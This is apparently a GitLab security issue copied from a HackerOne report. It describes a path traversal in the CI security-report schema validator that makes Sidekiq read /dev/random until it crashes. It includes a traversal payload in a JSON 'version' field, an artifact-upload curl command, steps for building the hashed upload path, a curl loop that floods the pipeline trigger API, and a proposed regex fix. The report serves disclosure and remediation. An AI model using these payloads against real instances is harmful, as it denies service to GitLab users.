Path Traversal leads to DoS and Restricted File Read through Report Artifact Parsing (Affects Gitlab.com)

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2401952 by pwnie on 2024-03-05, assigned to @ngeorge1:

Report | How To Reproduce

Report

Summary

lib/gitlab/ci/parsers/security/validators/schema_validator.rb contains a File.join that contains user controlled input (report_version):

              def schema_path  
                # The schema version selection logic here is described in the user documentation:  
                # https://docs.gitlab.com/ee/user/application_security/#security-report-validation  
                report_declared_version = File.join(root_path, report_version, file_name)  
                return report_declared_version if File.file?(report_declared_version)

This value can be controlled by uploading a bogus artifact file named "gl-secret-detection-report.json" with artifact type "secret_detection" and using a version JSON field with path traversals.

It's then passed to JSONSchemer.schema(pathname) and used to validate the CI scan artifact. Since we control the schema that's used, we can use $refs to include external schemas. JSONSchemer allows file system access, though not network access unless explicitly passed as an option. I thoroughly read the JSONSchemer code for any way to escalate this (dump sensitive JSON files by referencing them using $ref) and I don't think it's possible (I could be wrong). The reason for this is that JSONSchemer is conveniently returning errors during validation and Gitlab is also parsing them and returning them to the user:

              schema_validation_errors = schema.validate(report_data).map { |error| JSONSchemer::Errors.pretty(error) }

This means if we could reference a sensitive JSON file and somehow get the validation to fail and include the values of the JSON file we'd be golden. Though the JSONSchemer code has a very short list of what i can return:

     def pretty(error)  
        data_pointer, type, schema = error.values_at('data_pointer', 'type', 'schema')  
        location = data_pointer.empty? ? 'root' : "property '#{data_pointer}'"

        case type  
        when 'required'  
          keys = error.fetch('details').fetch('missing_keys').join(', ')  
          "#{location} is missing required keys: #{keys}"  
        when 'null', 'string', 'boolean', 'integer', 'number', 'array', 'object'  
          "#{location} is not of type: #{type}"  
        when 'pattern'  
          "#{location} does not match pattern: #{schema.fetch('pattern')}"  
        when 'format'  
          "#{location} does not match format: #{schema.fetch('format')}"  
        when 'const'  
          "#{location} is not: #{schema.fetch('const').inspect}"  
        when 'enum'  
          "#{location} is not one of: #{schema.fetch('enum')}"  
        else  
          "#{location} is invalid: error_type=#{type}"  
        end

schema would be the file we are referencing (any sensitive JSON file we want to leak), though since it obviously isn't a schema it's very hard to get anything useful from these errors. Though there is a vast array of JSON files on a given Omnibus installation many being log files that we probably can control and hence do something interesting.

root@gitlab:/# find . -name '*.json' 2>/dev/null  | wc -l  
913

Though I find that too painstakingly boring to pursue so I'll just leave it to you guys to decide whether or not this constitutes a file read at all.

The real issue I discovered is being able to hang a rails process and consume lots of ram rapidly:

.read(name, [length [, offset]][, opt]) ⇒ String  
Opens the file, optionally seeks to the given offset, then returns length bytes (defaulting to the rest of the file). #read ensures the file is closed before returning.

By supplying /dev/random as the target path. I've seen people rewarded pretty big bounties for server side ReDoS so that's why I decided to report this.

e.g. #416225 (closed)

Steps to reproduce

Configure an Omnibus Gitlab instance with an Ultimate license
Create a project
Ensure the Gitlab instance has shared runners available or configure a runner for the project
Ensure the runner can handle more than one build at a time (/etc/gitlab-runner/config.toml set concurrent = 10)
5.1 Edit the .gitlab-ci.yml file in your newly created project to:

bogus_artifact:  
  script: |  
    curl -X POST -v -F "file=[@]gl-secret-detection-report.json" "YOUR_GITLAB_INSTANCE_URL/api/v4/jobs/$CI_JOB_ID/artifacts?artifact_format=raw&artifact_type=secret_detection&token=$CI_JOB_TOKEN"

5.2 Replace YOUR_GITLAB_INSTANCE_URL with your Gitlab instance URL
6.1 Create a file locally and name it secret-detection-report-format.json and set the contents to {"$ref": "/dev/random"}
6.2 Create a new issue in the project and upload the file in a comment
7. Calculate the hashed path of the uploaded file by calculating the SHA2 hash of the project ID (numeric ID like 34)
8. Construct the hashed path by taking the first 2 characters of the hash as the first directory, the second 2 characters as the second directory and the entire hash as the third, example is below. Then take the secret of the file you uploaded (copy the link URL in the comments and then copy just the 32 hex part of it) and append it to the constructed path so far: 4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/725cc8b62466087c472932f7ce4b96de
9. Create a file in your new project with the following contents named gl-secret-detection-report.json and replace YOUR_FULL_HASH_PATH with the full path you just constructed :

{"version": "../../../../../../../../../../../../../../../../../../../../../../../../../var/opt/gitlab/gitlab-rails/uploads/[@]hashed/YOUR_FULL_HASH_PATH"}

Go to settings/ci_cd in your project (settings -> CI/CD), look for Pipeline trigger tokens, add new token, copy the token and save it
Execute the following command replacing the placeholders appropriately:

while true; do curl -X POST \            
     --fail \  
     -F token=YOUR_PIPELINE_TOKEN \  
     -F ref=main \  
     http://YOUR_GITLAB_INSTANCE/api/v4/projects/YOUR_PROJECT_ID/trigger/pipeline; done

This should generate many pipelines that are then handled by the runners configured for the project. If you properly configured the runner or runners to run multiple builds at once, you should see an increase in memory usage on your Gitlab instance once the pipelines are completed. This is due to /dev/random being read during the artifact parsing service.
To verify that this is indeed crashing sidekiq (artifact parsing is ran as a worker after a pipeline is complete), you can do:

cat sidekiq/current | grep -i terminate  
{"severity":"INFO","time":"2024-03-05T04:06:53.471Z","message":"A worker terminated, shutting down the cluster"}  
{"severity":"INFO","time":"2024-03-05T04:08:56.919Z","message":"A worker terminated, shutting down the cluster"}  
{"severity":"INFO","time":"2024-03-05T04:16:05.432Z","message":"A worker terminated, shutting down the cluster"}  
{"severity":"INFO","time":"2024-03-05T04:17:28.958Z","message":"A worker terminated, shutting down the cluster"}  
{"severity":"INFO","time":"2024-03-05T04:18:52.534Z","message":"A worker terminated, shutting down the cluster"}  
{"severity":"INFO","time":"2024-03-05T04:25:56.008Z","message":"A worker terminated, shutting down the cluster"}

or obviously just view system resource usage rapidly increase then decrease when the sidekiq process is killed along with any jobs being handled.
14. Since this kills sidekiq clusters, this means you can disrupt any services being ran and to be ran. Essentially a sidekiq DoS. This makes Gitlab unusable.

Impact

DoS of Gitlab instance sidekiq clusters

Environment

GitLab Enterprise Edition v16.7.3-ee Omnibus Package

Impact

DoS of Gitlab instance sidekiq clusters

How To Reproduce

Please add reproducibility information to this section:

Implementation

Add regex verification for report_version to Gitlab::Ci::Parsers::Security::Validators. Copy over schema format for consistency

Edited Apr 01, 2024 by Lucas Charles